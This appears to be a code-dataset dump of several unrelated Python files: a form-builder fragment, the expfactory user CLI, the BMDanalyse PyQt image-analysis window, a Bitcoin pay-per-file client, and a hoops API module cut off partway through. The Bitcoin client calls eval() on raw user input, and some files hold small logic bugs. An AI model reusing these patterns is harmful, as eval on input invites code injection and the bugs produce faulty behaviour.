set = self.add('FieldSet', {
'id' : 'set',
'css' : ['i-form-row i-margin-large']
})
table = set.add('HTMLTable')
roles = IN.nabar.roles
for rid, role in roles.items():
row = table['body'].add('HTMLTableRow')
row.add('HTMLTableColumn', {
'value' : role['name'],
'weight' : 1,
})
row.add('HTMLTableColumn', {
'value' : role['info'],
'weight' : 2,
})
set = self.add('FieldSet', {
'id' : 'actionset',
'css' : ['i-form-row i-text-primary']
})
#set.add('Submit', {
#'id' : 'submit',
#'value' : s('Register new account'),
#'css' : ['i-button i-button-primary i-button-large']
#})
self.css.append('i-panel i-panel-box i-margin-large')
@IN.register('FormNabarRoleAdmin', type = 'Former')
class FormNabarRoleAdminFormer(FormFormer):
def validate(self, form, post):
if form.has_errors: # fields may have errors
return
def submit(self, form, post):
if form.has_errors:
return
| apache-2.0 | 6,403,613,754,088,764,000 | 18.307692 | 68 | 0.578486 | false |
expfactory/expfactory | expfactory/cli/users.py | 1 | 3386 | """
Copyright (c) 2017-2021, Vanessa Sochat
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from expfactory.logger import bot
from expfactory.defaults import EXPFACTORY_DATABASE
import sys
import os
def main(args, parser, subparser):
from expfactory.server import app
header = "DATABASE\tTOKEN"
# The user wants to list active subjects
if args.list is True:
users = app.list_users() # returns id\ttoken
sys.exit(0)
# The user wants to add new subjects
number = args.new
if number is not None:
print(header)
for i in range(number):
user = app.generate_user()
app.print_user(user)
sys.exit(0)
# The user wants to manage user token
action = None
if args.revoke is not None:
subid = clean(args.revoke)
func = app.revoke_token
action = "Revoking"
elif args.refresh is not None:
subid = clean(args.refresh)
func = app.refresh_token
action = "Refreshing"
elif args.restart is not None:
subid = clean(args.restart)
func = app.restart_user
action = "Restarting"
elif args.finish is not None:
subid = clean(args.finish)
action = "Finishing"
func = app.finish_user
# Perform the action
if action is not None:
bot.info("%s %s" % (action, subid))
result = func(subid=subid)
if result is not None:
print("[%s] %s --> %s" % (action.lower(), subid, result))
else:
print("[%s] not successful. See logs for details." % (action.lower()))
print("Commands may only possible for [active] status.")
sys.exit(0)
print("See expfactory users --help for usage")
def clean(subid):
"""clean a subid, removing any folder extensions (_revoked or _finished)
for the functions
"""
for ext in ["_revoked", "_revoked"]:
subid = subid.replace(ext, "")
return subid
| bsd-3-clause | 55,951,420,547,235,040 | 33.20202 | 82 | 0.69049 | false |
mhogg/BMDanalyse | BMDanalyse/MainWindow.py | 1 | 30163 | # -*- coding: utf-8 -*-
# Copyright (C) 2016 Michael Hogg
# This file is part of BMDanalyse - See LICENSE.txt for information on usage and redistribution
import os, matplotlib, matplotlib.pyplot, types
import numpy as np
from pyqtgraph.Qt import QtCore, QtGui
from pyqtgraph import ImageItem
from pyqtgraph.widgets.GraphicsLayoutWidget import GraphicsLayoutWidget
from PIL import Image
from ViewBoxCustom import MultiRoiViewBox, ImageAnalysisViewBox
from MatplotlibWidget import MatplotlibWidget
from SidePanel import SidePanel
from TableWidget import TableWidget
from version import __version__
absDirPath = os.path.dirname(__file__)
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
self.loadIcons()
self.setupUserInterface()
self.setupSignals()
self.__version__ = __version__
# Initialise variables
self.imageFiles = {}
self.timeData = None
self.plotWin = None
self.imageWin = None
self.BMDchange = None
self.roiNames = None
def loadIcons(self):
""" Load icons """
self.icons = dict([
('BMDanalyseIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","logo.png"))),
('imageAddIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_add.png"))),
('imageRemIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_delete2.png"))),
('imageDownIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-up-2.png"))),
('imageUpIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-down-2.png"))),
('imagePrevIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-left.png"))),
('imageNextIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-right.png"))),
('roiAddIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","green-add3.png"))),
('roiRectIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","rectangularIcon.png"))),
('roiPolyIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","polygonIcon.png"))),
('roiRemIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","red_delete.png"))),
('roiSaveIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","filesave.png"))),
('roiCopyIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_copy.png"))),
('roiLoadIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","opened-folder.png")))])
def setupUserInterface(self):
""" Initialise the User Interface """
# Left frame
leftFrame = QtGui.QFrame()
leftFrameLayout = QtGui.QHBoxLayout()
leftFrame.setLayout(leftFrameLayout)
leftFrame.setLineWidth(0)
leftFrame.setFrameStyle(QtGui.QFrame.Panel)
leftFrameLayout.setContentsMargins(0,0,5,0)
# Left frame contents
self.viewMain = GraphicsLayoutWidget() # A GraphicsLayout within a GraphicsView
leftFrameLayout.addWidget(self.viewMain)
self.viewMain.setMinimumSize(200,200)
self.vb = MultiRoiViewBox(lockAspect=True,enableMenu=True)
self.viewMain.addItem(self.vb)
self.vb.disableAutoRange()
# Right frame
self.sidePanel = SidePanel(self)
# UI window (containing left and right frames)
UIwindow = QtGui.QWidget(self)
UIwindowLayout = QtGui.QHBoxLayout()
UIwindowSplitter = QtGui.QSplitter(QtCore.Qt.Horizontal)
UIwindowLayout.addWidget(UIwindowSplitter)
UIwindow.setLayout(UIwindowLayout)
self.setCentralWidget(UIwindow)
UIwindowSplitter.addWidget(leftFrame)
UIwindowSplitter.addWidget(self.sidePanel)
# Application window
self.setWindowTitle('BMDanalyse')
self.setWindowIcon(self.icons['BMDanalyseIcon'])
self.setMinimumSize(600,500)
self.resize(self.minimumSize())
# Window menus
self.createMenus()
self.createActions()
def createMenus(self):
# Menus
menubar = self.menuBar()
self.fileMenu = menubar.addMenu('&File')
self.imageMenu = menubar.addMenu('&Images')
self.roiMenu = menubar.addMenu('&ROIs')
self.submenu = self.roiMenu.addMenu(self.icons['roiAddIcon'],"Add ROI")
self.analyseMenu = menubar.addMenu('&Analysis')
self.aboutMenu = menubar.addMenu('A&bout')
def createActions(self):
# Actions for File menu
self.exitAct = QtGui.QAction("&Quit", self, shortcut="Ctrl+Q",statusTip="Exit the application")
self.exitAct.triggered[()].connect(self.close)
self.fileMenu.addAction(self.exitAct)
# Actions for Images menu
self.loadImageAct = QtGui.QAction(self.icons['imageAddIcon'], "&Load image(s)", self, shortcut="Ctrl+L")
self.removeImageAct = QtGui.QAction(self.icons['imageRemIcon'], "&Remove current image", self, shortcut="Ctrl+X")
imageMenuActions = [self.loadImageAct,self.removeImageAct]
imageMenuActFuncs = [self.loadImages,self.removeImage]
for i in xrange(len(imageMenuActions)):
action = imageMenuActions[i]
function = imageMenuActFuncs[i]
action.triggered[()].connect(function)
self.imageMenu.addAction(self.loadImageAct)
self.imageMenu.addAction(self.removeImageAct)
# Actions for ROI menu
self.addROIRectAct = QtGui.QAction("Rectangular",self.submenu)
self.addROIPolyAct = QtGui.QAction("Polygon",self.submenu)
self.addROIRectAct.triggered[()].connect(self.vb.addROI)
self.addROIPolyAct.triggered[()].connect(self.vb.addPolyRoiRequest)
self.submenu.addAction(self.addROIRectAct)
self.submenu.addAction(self.addROIPolyAct)
self.addROIRectAct.setIcon(self.icons['roiRectIcon'])
self.addROIPolyAct.setIcon(self.icons['roiPolyIcon'])
self.addROIRectAct.setShortcut("Ctrl+Shift+R")
self.addROIPolyAct.setShortcut("Ctrl+Shift+P")
self.loadRoiAct = QtGui.QAction(self.icons['roiLoadIcon'], "L&oad ROI", self, shortcut="Ctrl+O")
self.copyRoiAct = QtGui.QAction(self.icons['roiCopyIcon'], "&Copy ROI", self, shortcut="Ctrl+C")
self.saveRoiAct = QtGui.QAction(self.icons['roiSaveIcon'], "&Save ROI", self, shortcut="Ctrl+S")
self.remRoiAct = QtGui.QAction(self.icons['roiRemIcon'] , "&Remove ROI", self, shortcut="Ctrl+D")
roiMenuActions = [self.loadRoiAct,self.copyRoiAct,self.saveRoiAct,self.remRoiAct]
roiMenuActFuncs = [self.vb.loadROI,self.vb.copyROI,self.vb.saveROI,self.vb.removeROI]
for i in xrange(len(roiMenuActions)):
action = roiMenuActions[i]
function = roiMenuActFuncs[i]
action.triggered[()].connect(function)
self.roiMenu.addAction(action)
# Actions for Analyse menu
self.roiAnalysisAct = QtGui.QAction("&ROI analysis", self.viewMain, shortcut="Ctrl+R",triggered=self.getBMD)
self.imgAnalysisAct = QtGui.QAction("&Image analysis", self.viewMain, shortcut="Ctrl+I",triggered=self.imageAnalysis)
self.analyseMenu.addAction(self.roiAnalysisAct)
self.analyseMenu.addAction(self.imgAnalysisAct)
# Actions for
self.aboutAct = QtGui.QAction("&About", self.viewMain, shortcut='F1', triggered=self.onAbout)
self.aboutMenu.addAction(self.aboutAct)
def setupSignals(self):
""" Setup signals """
self.sidePanel.imageFileList.itemSelectionChanged.connect(self.getImageToDisplay)
self.sidePanel.buttImageAdd.clicked.connect(self.loadImages)
self.sidePanel.buttImageRem.clicked.connect(self.removeImage)
self.sidePanel.buttImageUp.clicked.connect(self.sidePanel.moveImageUp)
self.sidePanel.buttImageDown.clicked.connect(self.sidePanel.moveImageDown)
self.sidePanel.roiMenu.button1.clicked[()].connect(self.vb.addROI)
self.sidePanel.roiMenu.button2.clicked[()].connect(self.vb.addPolyRoiRequest)
self.sidePanel.buttRoiCopy.clicked[()].connect(self.vb.copyROI)
self.sidePanel.buttRoiRem.clicked.connect(self.vb.removeROI)
self.sidePanel.buttRoiLoad.clicked.connect(self.vb.loadROI)
self.sidePanel.buttRoiSave.clicked.connect(self.vb.saveROI)
self.sidePanel.buttRoiAnalysis.clicked.connect(self.getBMD)
self.sidePanel.buttImgAnalysis.clicked.connect(self.imageAnalysis)
def onAbout(self):
""" About BMDanalyse message"""
author ='Michael Hogg'
date ='2016'
version = self.__version__
QtGui.QMessageBox.about(self, 'About BMDanalyse',
"""
<b>BMDanalyse</b>
<p>A simple program for the analysis of a time series of Bone Mineral Density (BMD) images.</p>
<p>Used to evaluate the bone gain / loss in a number of regions of interest (ROIs) over time,
typically due to bone remodelling as a result of stress shielding around an orthopaedic implant.</p>
<p><table border="0" width="150">
<tr>
<td>Author:</td>
<td>%s</td>
</tr>
<tr>
<td>Version:</td>
<td>%s</td>
</tr>
<tr>
<td>Date:</td>
<td>%s</td>
</tr>
</table></p>
""" % (author,version,date))
def loadImages(self):
""" Load an image to be analysed """
newImages = {}
fileNames = QtGui.QFileDialog.getOpenFileNames(self, self.tr("Load images"),QtCore.QDir.currentPath())
# Fix for PySide. PySide doesn't support QStringList types. PyQt4 getOpenFileNames returns a QStringList, whereas PySide
# returns a type (the first entry being the list of filenames).
if isinstance(fileNames,types.TupleType): fileNames = fileNames[0]
if hasattr(QtCore,'QStringList') and isinstance(fileNames, QtCore.QStringList): fileNames = [str(i) for i in fileNames]
if len(fileNames)>0:
for fileName in fileNames:
if fileName!='':
img = Image.open(str(fileName))
imgarr = np.array(img.convert('L')) # Convert to 8-bit
imgarr = imgarr.swapaxes(0,1)
imgarr = imgarr[:,::-1]
newImages[fileName] = imgarr
# Add filenames to list widget. Only add new filenames. If filename exists aready, then
# it will not be added, but data will be updated
for fileName in sorted(newImages.keys()):
if not self.imageFiles.has_key(fileName):
self.sidePanel.addImageToList(fileName)
self.imageFiles[fileName] = newImages[fileName]
# Show image in Main window
self.vb.enableAutoRange()
if self.sidePanel.imageFileList.currentRow()==-1:
self.sidePanel.imageFileList.setCurrentRow(0)
self.showImage(str(self.sidePanel.imageFileList.currentItem().text()))
self.vb.disableAutoRange()
def removeImage(self):
""" Remove image from sidePanel imageFileList """
# Return if there is no image to remove
if self.vb.img is None: return
# Get current image in sidePanel imageFileList and remove from list
currentRow = self.sidePanel.imageFileList.currentRow()
image = self.sidePanel.imageFileList.takeItem(currentRow)
imageName = str(image.text())
# Delete key and value from dictionary
if imageName!='': del self.imageFiles[imageName]
# Get image item in imageFileList to replace deleted image
if self.sidePanel.imageFileList.count()==0:
self.vb.enableAutoRange()
self.vb.removeItem(self.vb.img)
self.vb.showImage(None)
self.vb.disableAutoRange()
else:
currentRow = self.sidePanel.imageFileList.currentRow()
imageName = str(self.sidePanel.imageFileList.item(currentRow).text())
self.showImage(imageName)
def showImage(self,imageFilename):
""" Shows image in main view """
self.arr = self.imageFiles[imageFilename]
self.vb.showImage(self.arr)
def getImageToDisplay(self):
""" Get current item in file list and display in main view"""
try: imageFilename = str(self.sidePanel.imageFileList.currentItem().text())
except: pass
else: self.showImage(imageFilename)
def getBMD(self):
""" Get change in BMD over time (e.g. for each image) for all ROIs.
Revised function that converts the list of images into a 3D array
and then uses the relative position of the ROIs to the current
image, self.vb.img, to get the average BMD value e.g. it doesn't use
setImage to change the image in the view. This requires that all
images are the same size and in the same position.
"""
# Return if there is no image or rois in view
if self.vb.img is None or len(self.vb.rois)==0: return
# Collect all images into a 3D array
imageFilenames = self.sidePanel.getListOfImages()
images = [self.imageFiles[str(name.text())] for name in imageFilenames]
imageData = np.dstack(images) # Doesn't work correctly if images are not all the same shape
numImages = len(images)
# Get BMD across image stack for each ROI
numROIs = len(self.vb.rois)
BMD = np.zeros((numImages,numROIs),dtype=float)
self.roiNames = []
for i in xrange(numROIs):
roi = self.vb.rois[i]
self.roiNames.append(roi.name)
arrRegion = roi.getArrayRegion(imageData,self.vb.img, axes=(0,1))
avgROIvalue = arrRegion.mean(axis=0).mean(axis=0)
BMD[:,i] = avgROIvalue
# Calculate the BMD change (percentage of original)
tol = 1.0e-06
for i in xrange(numROIs):
if abs(BMD[0,i])<tol:
BMD[:,i] = 100.
else:
BMD[:,i] = BMD[:,i] / BMD[0,i] * 100.
self.BMDchange = BMD-100.
if self.timeData is None or self.timeData.size!=numImages:
self.timeData = np.arange(numImages,dtype=float)
# Plot results
self.showResults()
def imageAnalysis(self):
# Generate images of BMD change
if self.vb.img is None: return
self.showImageWin()
def sliderValueChanged(self,value):
self.imageWin.sliderLabel.setText('BMD change: >= %d %s' % (value,'%'))
self.setLookupTable(value)
self.imageWin.vb.img2.setLookupTable(self.lut)
self.imageWin.vb.img2.setLevels([0,255])
def setLookupTable(self,val):
lut = []
for i in range(256):
if i > 127+val:
lut.append(matplotlib.cm.jet(255))
elif i < 127-val:
lut.append(matplotlib.cm.jet(0))
else:
lut.append((0.0,0.0,0.0,0.0))
lut = np.array(lut)*255
self.lut = np.array(lut,dtype=np.ubyte)
def createImageWin(self):
self.buttMinimumSize = QtCore.QSize(70,36)
self.iconSize = QtCore.QSize(24,24)
if self.imageWin==None:
self.imageWin = QtGui.QDialog(self, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint | \
QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint)
self.imageWin.setWindowTitle('BMDanalyse')
self.imageWin.setWindowIcon(self.icons['BMDanalyseIcon'])
self.imageWin.setMinimumSize(250,500)
self.imageWin.resize(self.imageWin.minimumSize())
# Create viewBox
self.imageWin.glw = GraphicsLayoutWidget() # A GraphicsLayout within a GraphicsView
self.imageWin.vb = ImageAnalysisViewBox(lockAspect=True,enableMenu=True)
self.imageWin.vb.disableAutoRange()
self.imageWin.glw.addItem(self.imageWin.vb)
arr = self.imageFiles.values()[0]
self.imageWin.vb.img1 = ImageItem(arr,autoRange=False,autoLevels=False)
self.imageWin.vb.addItem(self.imageWin.vb.img1)
self.imageWin.vb.img2 = ImageItem(None,autoRange=False,autoLevels=False)
self.imageWin.vb.addItem(self.imageWin.vb.img2)
self.imageWin.vb.autoRange()
lut = [ [ int(255*val) for val in matplotlib.cm.gray(i)[:3] ] for i in xrange(256) ]
lut = np.array(lut,dtype=np.ubyte)
self.imageWin.vb.img1.setLookupTable(lut)
# Label to show index of current image label
self.imageCurrCont = QtGui.QFrame()
self.imageCurrCont.setLineWidth(2)
self.imageCurrCont.setFrameStyle(QtGui.QFrame.Panel | QtGui.QFrame.Raised)
self.imageCurrCont.setMinimumWidth(70)
self.imageWin.currLabel = QtGui.QLabel("")
self.imageWin.currLabel.setAlignment(QtCore.Qt.AlignHCenter)
imageCurrContLayout = QtGui.QHBoxLayout()
imageCurrContLayout.addWidget(self.imageWin.currLabel)
self.imageCurrCont.setLayout(imageCurrContLayout)
# Create buttons to select images
self.imageWin.buttCont = QtGui.QWidget()
self.imageWin.buttPrev = QtGui.QPushButton(self.icons['imagePrevIcon'],"")
self.imageWin.buttNext = QtGui.QPushButton(self.icons['imageNextIcon'],"")
self.buttLayout = QtGui.QHBoxLayout()
self.buttLayout.addStretch(1)
self.buttLayout.addWidget(self.imageWin.buttPrev)
self.buttLayout.addWidget(self.imageCurrCont)
self.buttLayout.addWidget(self.imageWin.buttNext)
self.buttLayout.addStretch(1)
self.imageWin.buttCont.setLayout(self.buttLayout)
self.imageWin.buttPrev.setMinimumSize(self.buttMinimumSize)
self.imageWin.buttNext.setMinimumSize(self.buttMinimumSize)
self.imageWin.buttPrev.setIconSize(self.iconSize)
self.imageWin.buttNext.setIconSize(self.iconSize)
self.buttLayout.setContentsMargins(0,5,0,5)
self.imageWin.buttPrev.clicked.connect(self.prevImage)
self.imageWin.buttNext.clicked.connect(self.nextImage)
# Create slider
self.imageWin.sliderCon = QtGui.QWidget()
self.imageWin.slider = QtGui.QSlider(self)
self.imageWin.slider.setOrientation(QtCore.Qt.Horizontal)
self.imageWin.slider.setMinimum(1)
self.imageWin.slider.setMaximum(100)
self.imageWin.slider.setMinimumWidth(100)
self.imageWin.slider.valueChanged.connect(self.sliderValueChanged)
self.imageWin.sliderLabel = QtGui.QLabel('1')
self.imageWin.sliderLabel.setMinimumWidth(120)
self.sliderLayout = QtGui.QHBoxLayout()
self.sliderLayout.addStretch(1)
self.sliderLayout.addWidget(self.imageWin.sliderLabel)
self.sliderLayout.addWidget(self.imageWin.slider)
self.sliderLayout.addStretch(1)
self.imageWin.sliderCon.setLayout(self.sliderLayout)
self.sliderLayout.setContentsMargins(0,0,0,5)
# Format image window
self.imageWinLayout = QtGui.QVBoxLayout()
self.imageWinLayout.addWidget(self.imageWin.glw)
self.imageWinLayout.addWidget(self.imageWin.buttCont)
self.imageWinLayout.addWidget(self.imageWin.sliderCon)
self.imageWin.setLayout(self.imageWinLayout)
self.imageWin.imagesRGB = None
# Show
self.imageWin.show()
self.imageWin.slider.setValue(10)
self.sliderValueChanged(10)
self.imageWinIndex = 0
def prevImage(self):
minIndex = 0
currIndex = self.imageWinIndex
prevIndex = currIndex - 1
self.imageWinIndex = max(prevIndex,minIndex)
self.updateImageWin()
def nextImage(self):
numImages = len(self.imageFiles)
maxIndex = numImages - 1
currIndex = self.imageWinIndex
nextIndex = currIndex + 1
self.imageWinIndex = min(nextIndex,maxIndex)
self.updateImageWin()
def updateImageWin(self):
imageFilenames = self.sidePanel.getListOfImages()
imageName = imageFilenames[self.imageWinIndex]
self.imageWin.vb.img1.setImage(self.imageFiles[str(imageName.text())],autoLevels=False)
self.imageWin.vb.img2.setImage(self.imageWin.imagesRGB[self.imageWinIndex],autoLevels=False)
self.imageWin.currLabel.setText("%i / %i" % (self.imageWinIndex+1,len(imageFilenames)))
def showImageWin(self):
self.createImageWin()
self.imagesBMDpercentChange()
self.updateImageWin()
def imagesBMDpercentChange(self):
# Get image arrays and convert to an array of floats
imageFilenames = self.sidePanel.getListOfImages()
images = [ self.imageFiles[str(name.text())] for name in imageFilenames ]
imagesConv = []
for img in images:
image = img.copy()
image[np.where(image==0)] = 1
image = image.astype(np.float)
imagesConv.append(image)
# Calculate percentage change and set with limits -100% to +100%
imagesPercCh = []
imageInitial = imagesConv[0]
for image in imagesConv:
imagePercCh = (image-imageInitial)/imageInitial*100.
imagePercCh[np.where(imagePercCh> 100.)] = 100.
imagePercCh[np.where(imagePercCh<-100.)] = -100.
imagesPercCh.append(imagePercCh)
numImages = len(imagesPercCh)
self.imageWin.imagesRGB = []
for i in xrange(numImages):
image = imagesPercCh[i]
sx,sy = image.shape
imageRGB = image*(255/200.)+(255/2.)
self.imageWin.imagesRGB.append(imageRGB)
def BMDtoCSVfile(self):
""" Write BMD change to csv file """
fileName = QtGui.QFileDialog.getSaveFileName(None,self.tr("Export to CSV"),QtCore.QDir.currentPath(),self.tr("CSV (*.csv)"))
# Fix for PyQt/PySide compatibility. PyQt returns a QString, whereas PySide returns a tuple (first entry is filename as string)
if isinstance(fileName,types.TupleType): fileName = fileName[0]
if hasattr(QtCore,'QString') and isinstance(fileName, QtCore.QString): fileName = str(fileName)
if not fileName=='':
textFile = open(fileName,'w')
numFrames, numROIs = self.BMDchange.shape
roiNames = self.roiNames
header = "%10s," % 'Time'
header += ((numROIs-1)*'%10s,'+'%10s\n') % tuple(roiNames)
textFile.write(header)
for i in xrange(numFrames):
textFile.write('%10.1f,' % self.timeData[i])
for j in xrange(numROIs):
if j<numROIs-1: fmt = '%10.3f,'
else: fmt = '%10.3f\n'
textFile.write(fmt % self.BMDchange[i,j])
textFile.close()
def showResults(self,):
""" Plots BMD change using matplotlib """
# Create plot window
if self.plotWin==None:
self.plotWin = QtGui.QDialog(self, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint | \
QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint)
self.plotWin.setWindowTitle('BMDanalyse')
self.plotWin.setWindowIcon(self.icons['BMDanalyseIcon'])
self.plotWin.setMinimumSize(600,500)
self.plotWin.resize(self.minimumSize())
# Create Matplotlib widget
self.mplw = MatplotlibWidget(size=(5,6))
self.fig = self.mplw.getFigure()
self.editDataButton = QtGui.QPushButton('Edit plot')
self.exportCSVButton = QtGui.QPushButton('Export data')
self.mplw.toolbar.addWidget(self.editDataButton)
self.mplw.toolbar.addWidget(self.exportCSVButton)
self.editDataButton.clicked.connect(self.showEditBox)
self.exportCSVButton.clicked.connect(self.BMDtoCSVfile)
# Format plot window
self.plotWinLayout = QtGui.QVBoxLayout()
self.plotWinLayout.addWidget(self.mplw)
self.plotWin.setLayout(self.plotWinLayout)
self.createFigure()
self.plotWin.show()
self.mplw.draw()
def createFigure(self):
""" Creates plot of results """
self.ax1 = self.fig.add_subplot(111)
self.ax1.clear()
self.fig.subplots_adjust(bottom=0.15,top=0.85,left=0.15,right=0.925)
numFrames, numROIs = self.BMDchange.shape
t = self.timeData
# Plot data
for i in xrange(numROIs):
roiname = self.roiNames[i]
self.ax1.plot(t,self.BMDchange[:,i],'-o',label=roiname,linewidth=2.0)
kwargs = dict(y=1.05) # Or kwargs = {'y':1.05}
self.ax1.set_title('Change in Bone Mineral Density over time',fontsize=14,fontweight='roman',**kwargs)
self.ax1.set_xlabel('Time',fontsize=10)
self.ax1.set_ylabel('Change in BMD (%)',fontsize=10)
self.ax1.legend(loc=0)
matplotlib.pyplot.setp(self.ax1.get_xmajorticklabels(), fontsize=10)
matplotlib.pyplot.setp(self.ax1.get_ymajorticklabels(), fontsize=10)
matplotlib.pyplot.setp(self.ax1.get_legend().get_texts(),fontsize=10)
self.ax1.grid()
def fillEditBox(self):
rows,cols = self.BMDchange.shape
for i in xrange(rows):
itmValue = '%.2f' % self.timeData[i]
itm = QtGui.QTableWidgetItem(itmValue)
self.tableResults.setItem(i,0,itm)
for j in xrange(cols):
itmValue = '%.2f' % self.BMDchange[i,j]
itm = QtGui.QTableWidgetItem(itmValue)
self.tableResults.setItem(i,j+1,itm)
def showEditBox(self):
self.plotWin.editBox = QtGui.QDialog(self.plotWin, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint)
self.plotWin.editBox.setWindowIcon(self.icons['BMDanalyseIcon'])
self.plotWin.editBox.setWindowTitle('BMDanalyse')
self.plotWin.editBox.setModal(True)
# Add table
layout = QtGui.QVBoxLayout()
layout.setContentsMargins(10,10,10,10)
layout.setSpacing(20)
rows,cols = self.BMDchange.shape
self.tableResults = TableWidget(rows,cols+1,self.plotWin.editBox)
self.tableResults.verticalHeader().setVisible(True)
# Set headers
self.tableResults.setHorizontalHeaderItem(0,QtGui.QTableWidgetItem('Time'))
for i in xrange(cols):
header = QtGui.QTableWidgetItem(self.roiNames[i])
self.tableResults.setHorizontalHeaderItem(i+1,header)
# Add values to table
self.fillEditBox()
# Set layout
layout.addWidget(self.tableResults)
self.buttonsFrame = QtGui.QFrame()
self.buttonsLayout = QtGui.QHBoxLayout()
self.buttonReset = QtGui.QPushButton('Reset')
self.buttonSave = QtGui.QPushButton('Save')
self.buttonClose = QtGui.QPushButton('Cancel')
self.buttonReset.setFixedWidth(50)
self.buttonSave.setFixedWidth(50)
self.buttonClose.setFixedWidth(50)
self.buttonClose.clicked.connect(self.plotWin.editBox.close)
self.buttonSave.clicked.connect(self.updateTableValues)
self.buttonReset.clicked.connect(self.fillEditBox)
self.buttonsLayout.addStretch(1)
self.buttonsLayout.addWidget(self.buttonReset)
self.buttonsLayout.addWidget(self.buttonSave)
self.buttonsLayout.addWidget(self.buttonClose)
self.buttonsLayout.setContentsMargins(0,0,0,0)
self.buttonsFrame.setLayout(self.buttonsLayout)
layout.addWidget(self.buttonsFrame)
self.plotWin.editBox.setLayout(layout)
self.plotWin.editBox.setMaximumSize(layout.sizeHint())
self.plotWin.editBox.show()
def updateTableValues(self):
# Create temporary arrays
timeData = self.timeData.copy()
BMDchange = self.BMDchange.copy()
# Put the values from the tables into the temporary arrays
rows = self.tableResults.rowCount()
cols = self.tableResults.columnCount()
for r in xrange(rows):
for c in xrange(cols):
item = self.tableResults.item(r,c)
itemValue = float(item.text())
if c==0:
timeData[r] = itemValue
else:
BMDchange[r,c-1] = itemValue
# Check that time values are in increasing order. If so, then update arrays
if any(np.diff(timeData)<=0):
self.errorMessage = QtGui.QMessageBox()
self.errorMessage.setWindowIcon(self.icons['BMDanalyseIcon'])
self.errorMessage.setWindowTitle('BMDanalyse')
self.errorMessage.setText('Input error: Time values should be in order of increasing value')
self.errorMessage.setIcon(QtGui.QMessageBox.Warning)
self.errorMessage.open()
else:
self.timeData = timeData
self.BMDchange = BMDchange
self.createFigure()
self.mplw.draw()
self.plotWin.editBox.close() | mit | 8,683,989,055,049,540,000 | 48.940397 | 143 | 0.621192 | false |
fredzannarbor/pagekicker-community | scripts_python_3/bitcoin/fileclient/fileclient.py | 1 | 2020 | #!/usr/bin/env python3
import json
from two1.wallet import Wallet
from two1.bitrequests import BitTransferRequests
# set up bitrequest client for BitTransfer requests
wallet = Wallet()
requests = BitTransferRequests(wallet)
# server address
server_url = 'http://localhost:5000/'
def buy_file():
# get the file listing from the server
response = requests.get(url=server_url+'files')
file_list = json.loads(response.text)
# print the file list to the console
for file in range(len(file_list)):
print(("{}. {}\t{}".format(file+1, file_list[str(file+1)][0], file_list[str(file+1)][1])))
try:
# prompt the user to input the index number of the file to be purchased
sel = eval(input("Please enter the index of the file that you would like to purchase:"))
# check if the input index is valid key in file_list dict
if sel in file_list:
print(('You selected {} in our database'.format(file_list[sel][0])))
# create a 402 request with the server payout address
sel_url = server_url+'buy?selection={0}&payout_address={1}'
answer = requests.get(url=sel_url.format(int(sel), wallet.get_payout_address()), stream=True)
if answer.status_code != 200:
print("Could not make an offchain payment. Please check that you have sufficient buffer.")
else:
# open a file with the same name as the file being purchased and stream the data into it.
filename = file_list[str(sel)][0]
with open(filename, 'wb') as fd:
for chunk in answer.iter_content(4096):
fd.write(chunk)
fd.close()
print('Congratulations, you just purchased a file for bitcoin!')
else:
print("That is an invalid selection.")
except ValueError:
print("That is an invalid input. Only numerical inputs are accepted.")
if __name__ == '__main__':
buy_file()
| apache-2.0 | -9,155,594,795,914,871,000 | 35.727273 | 106 | 0.619307 | false |
jfillmore/hoops | hoops/base.py | 1 | 9650 | import copy
import json
import re
import logging
from flask import g, request
from flask.ext.restful import abort
from formencode import Invalid, Schema
from formencode.validators import Validator
from hoops.restful import Resource
from hoops.exc import APIValidationException
from hoops.status import library as status_library
request_logger = logging.getLogger('api.request')
class APIOperation(object):
'''
Used to map API parameter names to database fields. e.g.
field_map = {
(param_name, field_name) = lambda val: val,
...
}
'''
field_map = {}
def __call__(self, *args, **kwargs):
